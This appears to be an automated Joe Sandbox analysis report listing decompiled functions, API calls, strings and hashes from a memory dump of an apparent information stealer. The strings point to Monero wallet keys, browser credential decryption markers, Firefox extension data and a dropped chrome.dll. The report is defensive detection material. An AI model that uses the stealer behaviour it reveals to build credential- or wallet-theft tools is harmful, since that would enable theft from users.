Instruction ID: 29a38efe4e310140e46689c5b502488216d7505b8c6417d4c68d7dc13291dd60
Opcode Fuzzy Hash: 3bb85b5bf91467850977f9e064204344e256193311104bac4111c0a2d9539c79
Instruction Fuzzy Hash: 1F4125B014078C5EEB298B24CC85FFB7BEA9B41318F1445ECE98A961C2E2719A45CF60

Function 006068D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00606903

Part of subcall function 0060AA50: lstrcpy.KERNEL32(00610E1A,00000000), ref: 0060AA98

Part of subcall function 0060ACC0: lstrlen.KERNEL32(?,00F489C8,?,\Monero\wallet.keys,00610E1A), ref: 0060ACD5
Part of subcall function 0060ACC0: lstrcpy.KERNEL32(00000000), ref: 0060AD14
Part of subcall function 0060ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AD22

Part of subcall function 0060ABB0: lstrcpy.KERNEL32(?,00610E1A), ref: 0060AC15

ShellExecuteEx.SHELL32(0000003C), ref: 006069C6
ExitProcess.KERNEL32 ref: 006069F5

Strings

<, xrefs: 00606979

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
String ID: <
API String ID: 1148417306-4251816714
Opcode ID: 95085675555d584567132a6300fce2c9dfb6ac0bd0073d145a8cd8643b1ac98e
Instruction ID: 2d974f995214011c4a67f4ad807cd32f035dc4a1b01e84ce4a21edabe1286b3e
Opcode Fuzzy Hash: 95085675555d584567132a6300fce2c9dfb6ac0bd0073d145a8cd8643b1ac98e
Instruction Fuzzy Hash: A03118B1941218ABDB58EBA0DC92FDEB779AF08300F40419DF205671D1EF746A88CF69

Function 00608950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00610E10,00000000,?), ref: 006089BF
RtlAllocateHeap.NTDLL(00000000), ref: 006089C6
wsprintfA.USER32 ref: 006089E0

Part of subcall function 0060AA50: lstrcpy.KERNEL32(00610E1A,00000000), ref: 0060AA98

Strings

%dx%d, xrefs: 006089D7

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcesslstrcpywsprintf
String ID: %dx%d
API String ID: 1695172769-2206825331
Opcode ID: f06f9f176d36b4462871325ac383dec187a5a58af4ffd5ae8f538b6bb558bfbd
Instruction ID: 66abc76264ad90a0407fe7e0f4dd58204e8341d29ebe6f4c8f6978eea3df0849
Opcode Fuzzy Hash: f06f9f176d36b4462871325ac383dec187a5a58af4ffd5ae8f538b6bb558bfbd
Instruction Fuzzy Hash: 5C213DB1A44204AFDB04DFE8DD45FAEBBB8FB48711F104119FA16A72C0C775A9008FA0

Function 005FA090 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 005FA098

Strings

C:\ProgramData\chrome.dll, xrefs: 005FA093
connect_to_websocket, xrefs: 005FA0B3
free_result, xrefs: 005FA0C9

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
API String ID: 1029625771-1545816527
Opcode ID: 30da37417b38a57d883bbe8a631db46751d2ae9ecc5a59b7f88a90b8a9e0e689
Instruction ID: c3f8236c19d19c7a25706e66f9a67456820eed72ccb1fccf8656340233df0543
Opcode Fuzzy Hash: 30da37417b38a57d883bbe8a631db46751d2ae9ecc5a59b7f88a90b8a9e0e689
Instruction Fuzzy Hash: 5AF05EB064D608AFD701AB61EC48F663AB5F306715F004815F219972A0D7B9A9C5CF67

Function 00608EE0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000000FA,?,?,006096AE,00000000), ref: 00608EEB
RtlAllocateHeap.NTDLL(00000000), ref: 00608EF2
wsprintfW.USER32 ref: 00608F08

Strings

%hs, xrefs: 00608EFF

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcesswsprintf
String ID: %hs
API String ID: 769748085-2783943728
Opcode ID: 2a8bbc0abc763e947c1952b94054b359d6166caf8e7b7cf6eb1928fce01dcae4
Instruction ID: ca9a9153172bdae7f1bba09bd57a28c06a865b50c8e7a8ea47a467ae6e127385
Opcode Fuzzy Hash: 2a8bbc0abc763e947c1952b94054b359d6166caf8e7b7cf6eb1928fce01dcae4
Instruction Fuzzy Hash: 26E0EC75A48309BBEB10DB98DD0AE6D77B8FB05702F004195FD0A97340DA719E509F91

Function 005FA990 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0060AA50: lstrcpy.KERNEL32(00610E1A,00000000), ref: 0060AA98

Part of subcall function 0060ACC0: lstrlen.KERNEL32(?,00F489C8,?,\Monero\wallet.keys,00610E1A), ref: 0060ACD5
Part of subcall function 0060ACC0: lstrcpy.KERNEL32(00000000), ref: 0060AD14
Part of subcall function 0060ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AD22

Part of subcall function 0060ABB0: lstrcpy.KERNEL32(?,00610E1A), ref: 0060AC15

Part of subcall function 00608CF0: GetSystemTime.KERNEL32(00610E1B,00F4EF50,006105B6,?,?,005F13F9,?,0000001A,00610E1B,00000000,?,00F489C8,?,\Monero\wallet.keys,00610E1A), ref: 00608D16

Part of subcall function 0060AC30: lstrcpy.KERNEL32(00000000,?), ref: 0060AC82
Part of subcall function 0060AC30: lstrcat.KERNEL32(00000000), ref: 0060AC92

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 005FAA11
lstrlen.KERNEL32(00000000,00000000), ref: 005FAB2F
lstrlen.KERNEL32(00000000), ref: 005FADEC

Part of subcall function 0060AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0060AAF6

DeleteFileA.KERNEL32(00000000), ref: 005FAE73

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 5a3666f6c21ababc50e812fb860397c67cceb4ad6980058b9817dbd7dec0b0a8
Instruction ID: 26c42ed7a4e335852ca52dc6bcde9f2095b0c9381dfebe4cc296f09d29d27369
Opcode Fuzzy Hash: 5a3666f6c21ababc50e812fb860397c67cceb4ad6980058b9817dbd7dec0b0a8
Instruction Fuzzy Hash: A3E1CC729502189BCB48FBE4DDA2EEF733AAF54340F50855DF116620D1EF706A48CB6A

Function 005FD500 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0060AA50: lstrcpy.KERNEL32(00610E1A,00000000), ref: 0060AA98

Part of subcall function 0060ACC0: lstrlen.KERNEL32(?,00F489C8,?,\Monero\wallet.keys,00610E1A), ref: 0060ACD5
Part of subcall function 0060ACC0: lstrcpy.KERNEL32(00000000), ref: 0060AD14
Part of subcall function 0060ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AD22

Part of subcall function 0060ABB0: lstrcpy.KERNEL32(?,00610E1A), ref: 0060AC15

Part of subcall function 00608CF0: GetSystemTime.KERNEL32(00610E1B,00F4EF50,006105B6,?,?,005F13F9,?,0000001A,00610E1B,00000000,?,00F489C8,?,\Monero\wallet.keys,00610E1A), ref: 00608D16

Part of subcall function 0060AC30: lstrcpy.KERNEL32(00000000,?), ref: 0060AC82
Part of subcall function 0060AC30: lstrcat.KERNEL32(00000000), ref: 0060AC92

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 005FD581
lstrlen.KERNEL32(00000000), ref: 005FD798
lstrlen.KERNEL32(00000000), ref: 005FD7AC
DeleteFileA.KERNEL32(00000000), ref: 005FD82B

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: e9610674b5ab905f36877b20e5f047f1ca30f26bc0eea3d953c530604cac270f
Instruction ID: 9fff848792523c70421611d85ae2eeedba9f55eba7ed757164b8f2242f5599fb
Opcode Fuzzy Hash: e9610674b5ab905f36877b20e5f047f1ca30f26bc0eea3d953c530604cac270f
Instruction Fuzzy Hash: EA91DB729502089BCB48FBE4DCA6EEF733AAF54340F50456DF116660D1EF706A48CB6A

Function 005FD880 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0060AA50: lstrcpy.KERNEL32(00610E1A,00000000), ref: 0060AA98

Part of subcall function 0060ACC0: lstrlen.KERNEL32(?,00F489C8,?,\Monero\wallet.keys,00610E1A), ref: 0060ACD5
Part of subcall function 0060ACC0: lstrcpy.KERNEL32(00000000), ref: 0060AD14
Part of subcall function 0060ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AD22

Part of subcall function 0060ABB0: lstrcpy.KERNEL32(?,00610E1A), ref: 0060AC15

Part of subcall function 00608CF0: GetSystemTime.KERNEL32(00610E1B,00F4EF50,006105B6,?,?,005F13F9,?,0000001A,00610E1B,00000000,?,00F489C8,?,\Monero\wallet.keys,00610E1A), ref: 00608D16

Part of subcall function 0060AC30: lstrcpy.KERNEL32(00000000,?), ref: 0060AC82
Part of subcall function 0060AC30: lstrcat.KERNEL32(00000000), ref: 0060AC92

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 005FD901
lstrlen.KERNEL32(00000000), ref: 005FDA9F
lstrlen.KERNEL32(00000000), ref: 005FDAB3
DeleteFileA.KERNEL32(00000000), ref: 005FDB32

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: fa3b0696718c65ffb74442bfb77e0965c23ab9fa308d0b687ca26f1db180b745
Instruction ID: 3a5ea8548cf90f45ab931a9ebd685b3360eb36aa140804add43483b30bf9655d
Opcode Fuzzy Hash: fa3b0696718c65ffb74442bfb77e0965c23ab9fa308d0b687ca26f1db180b745
Instruction Fuzzy Hash: EA81D9729502089BCB48FBE4DCA6DEF733AAF54340F40456DF116660E1EF746A48CB6A

Function 0066FED7 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 0066FF9E
___AdjustPointer.LIBCMT ref: 0066FFC1
___AdjustPointer.LIBCMT ref: 0067005D

Memory Dump Source

Source File: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
Instruction ID: 69fbd2ed94efc9fdaaadcc4b6c5a7b0060e9d4f79701b16f68b348f45a1df3d5
Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
Instruction Fuzzy Hash: 3851E372605206EFFB298F14E881BBA77A6FF41310F24813DE90997691E731ED40DBA0

Function 005FA560 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 158memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,?), ref: 005FA664

Part of subcall function 0060AA50: lstrcpy.KERNEL32(00610E1A,00000000), ref: 0060AA98

Strings

@, xrefs: 005FA614
v10, xrefs: 005FA5C6
v20, xrefs: 005FA571

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: AllocLocallstrcpy
String ID: @$v10$v20
API String ID: 2746078483-278772428
Opcode ID: f188a010e91a6d96bf6e486c345e23669733f507c0d04b06ce865a9f6516b798
Instruction ID: f3ac8c2410a8e7063519949a1392f079870588b80390ee0836979e4c75d05f44
Opcode Fuzzy Hash: f188a010e91a6d96bf6e486c345e23669733f507c0d04b06ce865a9f6516b798
Instruction Fuzzy Hash: 98513C70A5020CEFDB18EFA4CD96FEE7776BF44384F408018EA0A5B291DB746A45CB56

Function 005FF5A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0060AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0060AAF6

Part of subcall function 005FA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005FA13C
Part of subcall function 005FA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 005FA161
Part of subcall function 005FA110: LocalAlloc.KERNEL32(00000040,?), ref: 005FA181
Part of subcall function 005FA110: ReadFile.KERNEL32(000000FF,?,00000000,005F148F,00000000), ref: 005FA1AA
Part of subcall function 005FA110: LocalFree.KERNEL32(005F148F), ref: 005FA1E0
Part of subcall function 005FA110: CloseHandle.KERNEL32(000000FF), ref: 005FA1EA

Part of subcall function 00608FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00608FE2

Part of subcall function 0060AA50: lstrcpy.KERNEL32(00610E1A,00000000), ref: 0060AA98

Part of subcall function 0060ACC0: lstrlen.KERNEL32(?,00F489C8,?,\Monero\wallet.keys,00610E1A), ref: 0060ACD5
Part of subcall function 0060ACC0: lstrcpy.KERNEL32(00000000), ref: 0060AD14
Part of subcall function 0060ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AD22

Part of subcall function 0060ABB0: lstrcpy.KERNEL32(?,00610E1A), ref: 0060AC15

Part of subcall function 0060AC30: lstrcpy.KERNEL32(00000000,?), ref: 0060AC82
Part of subcall function 0060AC30: lstrcat.KERNEL32(00000000), ref: 0060AC92

StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00611678,00610D93), ref: 005FF64C
lstrlen.KERNEL32(00000000), ref: 005FF66B

Strings

moz-extension+++, xrefs: 005FF6AD
^userContextId=4294967295, xrefs: 005FF69C

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
